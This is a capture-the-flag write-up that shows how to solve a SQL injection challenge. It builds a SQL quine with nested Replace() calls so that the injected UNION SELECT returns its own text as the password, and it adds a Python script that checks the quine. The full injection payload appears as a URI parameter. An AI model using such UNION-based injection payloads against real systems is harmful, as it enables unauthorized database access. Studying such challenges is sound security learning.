
ouroboros


We are provided with the SQL query:

SELECT pw FROM prob_ouroboros WHERE pw='{$_GET[pw]}'

If $result['pw'] is equal to $_GET['pw'], the challenge is solved.

If we provide the following URI parameter:

?pw=' UNION SELECT 1 -- -

The resultant query becomes:

SELECT pw FROM prob_ouroboros WHERE pw='' UNION SELECT 1 -- -'


In this case the $result['pw'] and $_GET['pw'] differ as follows:

$result['pw']: 1
$_GET['pw']: ' UNION SELECT 1 -- -

In order to make them the same, we have to use a Quine program.


Quine

A Quine is a program that outputs its own source code without reading it from any input. An example of a SQL Quine is:

SELECT Replace(Replace(
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine',
char(34),char(39)),char(36),
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine')
AS Quine

Initial string

'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine'

First replacement

-- - SELECT Replace( -- -
Replace(
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine',
char(34),
char(39)
)
-- - , char(36), 'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine') AS Quine -- -

Replace all occurrences of char(34) (double quote " character) with char(39) (single quote ' character):

-- - SELECT Replace( -- -
'SELECT Replace(Replace(\'$\',char(34),char(39)),char(36),\'$\') AS Quine'
-- - , char(36), 'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine') AS Quine -- -

Second replacement

-- - SELECT -- -
Replace(
'SELECT Replace(Replace('$',char(34),char(39)),char(36),'$') AS Quine',
char(36),
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine'
)
-- - AS Quine -- -

Replace all occurrences of char(36) (dollar sign $ character) with the original string:

-- - SELECT -- -
'SELECT Replace(Replace(
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\',
char(34),char(39)),char(36),
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\')
AS Quine'
-- - AS Quine -- -

Putting it All Together

The final result of the query is the string after both replacements, as follows:

SELECT
'SELECT Replace(Replace(
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\',
char(34), char(39)), char(36),
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\')
AS Quine'
AS Quine

When this SQL query is executed, it will produce a single column named Quine containing the following text:

SELECT Replace(Replace(
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine',
char(34), char(39)), char(36),
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine')
AS Quine

Thus, we can see how the query repeats itself.


Modified Quine

' UNION SELECT Replace(Replace(
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23',
char(34),char(39)),char(36),
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')
%23

First replacement

-- - ' UNION SELECT Replace( -- -
Replace(
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23',
char(34),
char(39)
)
-- -,char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')%23 -- -

Replace all occurrences of char(34) (double quote " character) with char(39) (single quote ' character):

-- - ' UNION SELECT Replace( -- -
'\' UNION SELECT Replace(Replace(\'$\',char(34),char(39)),char(36),\'$\')%23'
-- -,char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')%23 -- -

Second replacement

-- - ' UNION SELECT -- -
Replace(
'\' UNION SELECT Replace(Replace('$',char(34),char(39)),char(36),'$')%23',
char(36),
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')
-- - %23 -- -

Replace all occurrences of char(36) (dollar sign $ character) with the original string:

-- - ' UNION SELECT -- -
'\' UNION SELECT Replace(Replace(
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
,char(34),char(39)),char(36),
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
)%23'
-- - %23 -- -

Putting it all together

The final result of the query is the string after both replacements, as follows:

' UNION SELECT 
\'\' UNION SELECT Replace(Replace(
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
,char(34),char(39)),char(36),
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
)%23'
%23

When this SQL query is executed, it will return the following text:

' UNION SELECT Replace(Replace(
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23',
char(34),char(39)),char(36),
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23'
)%23

We have successfully managed to create a Quine to solve this challenge.


Now we apply this to the challenge. The %23 comment marker (a URL-encoded #) is replaced with -- -, so the Quine becomes:

' UNION SELECT Replace(Replace('" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -',char(34),char(39)),char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -') -- -

If we provide the following URI parameter:

?pw=' UNION SELECT Replace(Replace('" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -',char(34),char(39)),char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -') -- -

The resultant query becomes:

SELECT pw FROM prob_ouroboros WHERE pw='' UNION SELECT Replace(Replace('" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -',char(34),char(39)),char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -') -- -'
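The two substitution steps walked through above (for the plain Quine and for the modified one) can be replayed outside the database to confirm that the returned value really is the query text. This is an added example, not code from the write-up: MySQL's Replace() is modelled with str.replace(), and the text before and after the nested Replace() expression is parameterized so both of the page's variants, and any similar one, can be checked the same way.

```python
# Added example: simulate the nested Replace() Quine and check the fixed point.
# Assumption: MySQL Replace() behaves like str.replace() (all occurrences,
# left to right, no re-scanning of inserted text), which holds for this query.

# The part of the template that is the same in every variant. It uses only
# double quotes (char(34)) and two '$' (char(36)) placeholders.
CORE = 'Replace(Replace("$",char(34),char(39)),char(36),"$")'


def make_template(prefix: str, suffix: str) -> str:
    """The literal embedded twice in the query. Single quotes in prefix/suffix
    become double quotes here because the literal is single-quote delimited;
    the first Replace() turns them back. prefix/suffix must contain no double
    quote and no '$' of their own, otherwise the fixed point breaks."""
    return (prefix + CORE + suffix).replace("'", '"')


def build_query(prefix: str, suffix: str) -> str:
    """Query text: prefix, nested Replace() calls holding the template twice
    as a single-quoted literal, then suffix (e.g. ' AS Quine' or ' -- -')."""
    t = make_template(prefix, suffix)
    return (prefix + "Replace(Replace('" + t + "',char(34),char(39)),char(36),'"
            + t + "')" + suffix)


def evaluate_query(prefix: str, suffix: str) -> str:
    """What the database returns for build_query(prefix, suffix)."""
    t = make_template(prefix, suffix)
    step1 = t.replace('"', "'")   # Replace(t, char(34), char(39))
    return step1.replace("$", t)  # Replace(step1, char(36), t)


def is_fixed_point(prefix: str, suffix: str) -> bool:
    """True when the selected value is byte-for-byte the query text, i.e. when
    the challenge's $result['pw'] == $_GET['pw'] comparison would hold."""
    return evaluate_query(prefix, suffix) == build_query(prefix, suffix)


if __name__ == "__main__":
    # The write-up's plain Quine and its ouroboros variant.
    for prefix, suffix in (("SELECT ", " AS Quine"), ("' UNION SELECT ", " -- -")):
        print(is_fixed_point(prefix, suffix))
        print(build_query(prefix, suffix))
    # A stray '$' in the surrounding text is expanded by the second Replace(),
    # so the output no longer matches the query.
    print(is_fixed_point("SELECT $", " AS Quine"))  # False
```

The same check explains why a space inside the outer char(39) call, or a mismatch in the case of Replace, would make the two strings differ even though the SQL still runs.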
